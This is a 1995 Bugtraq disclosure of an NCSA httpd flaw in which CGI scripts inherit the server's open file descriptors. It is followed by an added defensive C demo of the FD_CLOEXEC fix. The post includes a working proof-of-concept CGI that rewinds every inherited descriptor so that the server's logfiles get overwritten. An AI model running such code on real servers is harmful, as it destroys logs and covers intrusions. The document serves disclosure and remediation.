[1625] in bugtraq
CGI script insecurity in NCSA httpd
daemon@ATHENA.MIT.EDU (Paul Phillips)
Thu Apr 27 05:48:42 1995
Date: Wed, 26 Apr 1995 23:43:49 -0700
From: Paul Phillips <paulp@CERF.NET>
Followup-To: comp.infosystems.www.providers
Cc: httpd@ncsa.uiuc.edu, bugtraq@fc.net
Greetings, all. Anyone with access to CGI scripts on your server can
destroy all your logfiles and possibly wreak other havoc. The problem
is that NCSA httpd does not close open file descriptors on exec, so
CGI scripts still have access to all the originals. If you need a
demonstration, run the following as a CGI on your server:
#include <errno.h>
#include <stdio.h>      /* printf */
#include <sys/types.h>
#include <unistd.h>     /* lseek, SEEK_SET */
#define OPEN_MAX 255 /* good enough :-) */
int main(int argc, char ** argv)
{
    int i;
    printf("Content-type: text/plain\n\n");
    /* Every descriptor the server left open is inherited across exec.
     * lseek() on such a descriptor succeeds (and rewinds it to offset 0);
     * on a closed descriptor it fails with EBADF. A pipe or socket fails
     * with ESPIPE instead and is therefore also reported here. */
    for(i = 0; i < OPEN_MAX; i++) {
        if(lseek(i, 0, SEEK_SET) != -1 || errno != EBADF)
            printf("I just reset fd %d. Ha!\n", i);
    }
    return 0;
}
Please note that this will reset all your logfiles to the beginning,
causing new data to overwrite old data. Other, equally entertaining
things can be done with these open file descriptors. The fix is to
set the close-on-exec flag whenever a new file descriptor is allocated,
especially when the log files are opened, as in
fcntl(fd, F_SETFD, FD_CLOEXEC);
Since these file descriptors are open to root-owned files, I pondered
whether cracking root was possible. It does not appear so, since fchmod
checks the euid of the process even though it has an open descriptor,
and this is normally "nobody". HOWEVER, I have not given the matter an
enormous amount of thought, so a greater vulnerability may exist here.
I welcome comments.
--
Paul Phillips EMAIL: paulp@cerf.net
WWW: http://www.primus.com/staff/paulp/ PHONE: (619) 220-0850
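The descriptor leak and the FD_CLOEXEC fix from the post above, as an added example that is not part of the original message or of NCSA httpd: a small "server" opens a log file, forks and execs /bin/sh as a stand-in CGI, and the child reports whether the inherited descriptor number is still usable. Without the flag the exec'd child can dup (and so rewind or write to) the log; with fcntl(fd, F_SETFD, FD_CLOEXEC) set right after open(), the descriptor is gone by the time the child runs. The log path under /tmp, the fake log line and the use of /bin/sh as the CGI are assumptions for the demo.

```c
/*
 * Added example (not from the post or NCSA httpd): demonstrate that a
 * descriptor without FD_CLOEXEC survives fork+exec into a CGI process,
 * and that setting the flag closes it. Assumes a POSIX system with
 * /bin/sh and a writable /tmp.
 */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Open (creating) a log file. With cloexec != 0 the descriptor gets
 * FD_CLOEXEC right after open(), which is the fix the post recommends. */
static int open_log(const char *path, int cloexec)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_APPEND, 0600);
    if (fd == -1)
        return -1;
    if (cloexec && fcntl(fd, F_SETFD, FD_CLOEXEC) == -1) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Fork and exec /bin/sh (our stand-in CGI). The shell tries to dup the
 * inherited descriptor number onto another fd; that dup succeeds (shell
 * exits 0) only if the number is still open after exec.
 * Returns 1 = reachable, 0 = closed across exec, -1 = fork/wait error. */
static int cgi_can_reach_fd(int fd)
{
    char cmd[64];
    pid_t pid;
    int status;
    int target = (fd == 9) ? 8 : 9;     /* avoid duping a fd onto itself */

    /* stderr is redirected first so a failing dup stays quiet */
    snprintf(cmd, sizeof cmd, "exec 2>/dev/null %d>&%d", target, fd);
    pid = fork();
    if (pid == -1)
        return -1;
    if (pid == 0) {
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        _exit(127);                     /* exec itself failed */
    }
    if (waitpid(pid, &status, 0) == -1)
        return -1;
    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
}

/* End to end: open a throwaway log (path constructed for this example),
 * write one fake log line, spawn the "CGI", then clean up.
 * Returns cgi_can_reach_fd()'s result for the log descriptor. */
int cgi_inherits_log(int cloexec)
{
    char path[64];
    int fd, reachable;

    snprintf(path, sizeof path, "/tmp/cloexec-demo-%ld", (long)getpid());
    fd = open_log(path, cloexec);
    if (fd == -1)
        return -1;
    if (write(fd, "GET / HTTP/1.0\n", 15) == -1) {   /* constructed log line */
        close(fd);
        unlink(path);
        return -1;
    }
    reachable = cgi_can_reach_fd(fd);
    close(fd);
    unlink(path);
    return reachable;
}

int main(void)
{
    printf("without FD_CLOEXEC: CGI can reach the log fd? %d\n", cgi_inherits_log(0));
    printf("with    FD_CLOEXEC: CGI can reach the log fd? %d\n", cgi_inherits_log(1));
    return 0;
}
```

The child uses a shell redirection rather than lseek because dup2() is exactly the operation a CGI needs to start abusing an inherited descriptor, and because a dup test does not misreport pipes or sockets the way the post's lseek probe does. On Linux the same effect can be had atomically with open(..., O_CLOEXEC), which avoids the window between open() and fcntl() in a multithreaded server; the post's two-step fcntl form is what portable code of its era could use.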